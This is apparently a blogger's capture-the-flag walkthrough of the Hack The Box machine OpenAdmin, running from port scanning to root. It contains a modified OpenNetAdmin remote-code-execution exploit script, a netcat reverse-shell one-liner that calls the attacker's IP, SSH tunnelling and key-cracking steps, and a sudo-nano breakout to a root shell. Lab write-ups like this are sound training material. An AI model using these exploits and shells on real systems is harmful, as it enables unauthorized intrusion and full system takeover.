This post documents the complete walkthrough of OpenAdmin, a retired vulnerable VM created by dmw0ng, and hosted at Hack The Box. If you are uncomfortable with spoilers, please stop reading now.
On this post
Background
OpenAdmin is a retired vulnerable VM from Hack The Box.
Information Gathering
Let’s start with a masscan
probe to establish the open ports in the host.
# masscan -e tun1 -p1-65535,U:1-65535 10.10.10.171 --rate=700
Starting masscan 1.0.5 (http://bit.ly/14GZzcT) at 2020-01-07 01:55:18 GMT
-- forced options: -sS -Pn -n --randomize-hosts -v --send-eth
Initiating SYN Stealth Scan
Scanning 1 hosts [131070 ports/host]
Discovered open port 80/tcp on 10.10.10.171
Discovered open port 22/tcp on 10.10.10.171
Nothing extraordinary. Let’s do one better with nmap
scanning the discovered ports to establish their services.
# nmap -n -v -Pn -p22,80 -A --reason -oN nmap.txt 10.10.10.171
...
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 63 OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 4b:98:df:85:d1:7e:f0:3d:da:48:cd:bc:92:00:b7:54 (RSA)
| 256 dc:eb:3d:c9:44:d1:18:b1:22:b4:cf:de:bd:6c:7a:54 (ECDSA)
|_ 256 dc:ad:ca:3c:11:31:5b:6f:e6:a4:89:34:7c:9b:e5:50 (ED25519)
80/tcp open http syn-ack ttl 63 Apache httpd 2.4.29 ((Ubuntu))
| http-methods:
|_ Supported Methods: GET POST OPTIONS HEAD
|_http-title: Apache2 Ubuntu Default Page: It works
Whoa! This is a shit-show man. In any case, this is what the site looks like.
You can’t get more default than this
Directory/File Enumeration
Let’s switch gear and see what we can discover from fuzzing the site with wfuzz
.
# wfuzz -w /usr/share/seclists/Discovery/Web-Content/common.txt -t 64 --hc 404 http://10.10.10.171/FUZZ
********************************************************
* Wfuzz 2.2.11 - The Web Fuzzer *
********************************************************
Target: http://10.10.10.171/FUZZ
Total requests: 4644
==================================================================
ID Response Lines Word Chars Payload
==================================================================
000669: C=301 9 L 28 W 314 Ch "artwork"
002145: C=200 375 L 964 W 10918 Ch "index.html"
002715: C=301 9 L 28 W 312 Ch "music"
003648: C=403 9 L 28 W 277 Ch "server-status"
000011: C=403 9 L 28 W 277 Ch ".htaccess"
000012: C=403 9 L 28 W 277 Ch ".htpasswd"
000010: C=403 9 L 28 W 277 Ch ".hta"
Total time: 26.21841
Processed Requests: 4644
Filtered Requests: 4637
Requests/sec.: 177.1274
Interesting. It appears that we have two directories: artwork and music. This is how they look like.
/artwork
/music
They are both apparently very good-looking templates but only one of them offers the path forward. If you look at /music
, there’s a hyperlink to /ona
, which stands for OpenNetAdmin.
OpenNetAdmin 18.1.1 - Remote Code Execution
This is how it looks like.
I think we have the exploit we need in EDB-ID 47691. After understanding what the exploit does, I modified it a little to suit my needs.
#!/bin/bash
HOST=10.10.10.171
CMD=$(urlencode $1)
curl -i \
-s \
-d "xajax=window_submit&xajaxr=1574117726710&xajaxargs[]=tooltips&xajaxargs[]=ip%3D%3E;echo \"BEGIN\";$CMD;echo \"END\"&xajaxargs[]=ping" \
$HOST/ona/ \
| sed '/BEGIN/,/END/!d' \
| sed -r -e '1d' -e '$d'
Let’s give it a shot.
Awesome.
Low-Privilege Shell
With that, it’s pretty trivial to get a reverse shell albeit a low-privileged one. On one hand, send a reverse shell back to myself, and on the other hand set up a listener to receive the reverse shell, you know, the standard stuff.
# ./cmd.sh "rm -rf /tmp/p; mknod /tmp/p p; /bin/bash </tmp/p | nc 10.10.15.195 1234 >/tmp/p"
Bam. There you have it.
Getting user.txt
During enumeration of www-data
’s account, I notice that there are two accounts in the same group: jimmy
(1000) and joanna
(1001).
They are both are in the internal
group.
A simple find
for resources associated with the internal
group reveals the following.
Further digging into virtual hosts configuration reveals the following.
Well, I know what to do but in any case, I’ll still need to log in to jimmy
’s account first.
OpenNetAdmin’s Database Configuration
I chanced upon ONA’s database configuration while I was exploring the /opt/ona/www
directory.
Hmm. The password n1nj4W4rri0R!
piques my curiosity. Maybe it’s the password to one of the accounts? There’s only one way to find out.
Logging in as jimmy
Indeed. It’s jimmy
’s password.
Now, we can navigate to /var/www/internal
to look at its contents.
There’s something interesting in index.php
.
if ($_POST['username'] == 'jimmy' && hash('sha512',$_POST['password']) == '00e302...0523b1') {
$_SESSION['username'] = 'jimmy';
header("Location: /main.php");
} else {
$msg = 'Wrong username or password.';
}
In order to “log in”, the SHA512 hash of the password must match 00e302...0523b1
. Using an online cracker, the password was revealed to be, are you ready? Revealed
Well, in any case, I could have edited index.php
to have any password I like without resorting to password cracking.
SSH Local Port Forwarding
Since I have access to jimmy
’s account, I can dump a SSH public key I control into /home/jimmy/.ssh/authorized_keys
in order to forward my local port to the remote port 52846. Assuming I have done that, here’s the command to create the SSH tunnel to access internal.openadmin.htb:52846
:
ssh -L 52846:127.0.0.1:52846 -i jimmy [email protected]
Once that’s done, I should have a local port listening at 52846/tcp
.
Accessing joanna
’s SSH private key
Suffice to say, I added internal.openadmin.htb
to /etc/hosts
mapping it to 127.0.0.1
.
After logging in, joanna
’s SSH password-protected private key is revealed along with a hint what the password might be.
John the Ripper
Enter JtR.
The password to unlock joanna
’s private key is bloodninjas
. With that, we can finally log in to joanna
’s account and retrieve user.txt
.
Privilege Escalation
During enumeration of joanna
’s account, I notice that joanna
is able to sudo
nano
to open /opt/priv
.
GTFOBins
This is a classic GTFOBins attack. Following the instruction, I was able to break out of nano
to get myself a root
shell.
nano
^R^X
reset; sh 1>&0 2>&0
Armed with a root
shell, getting root.txt
is trivial.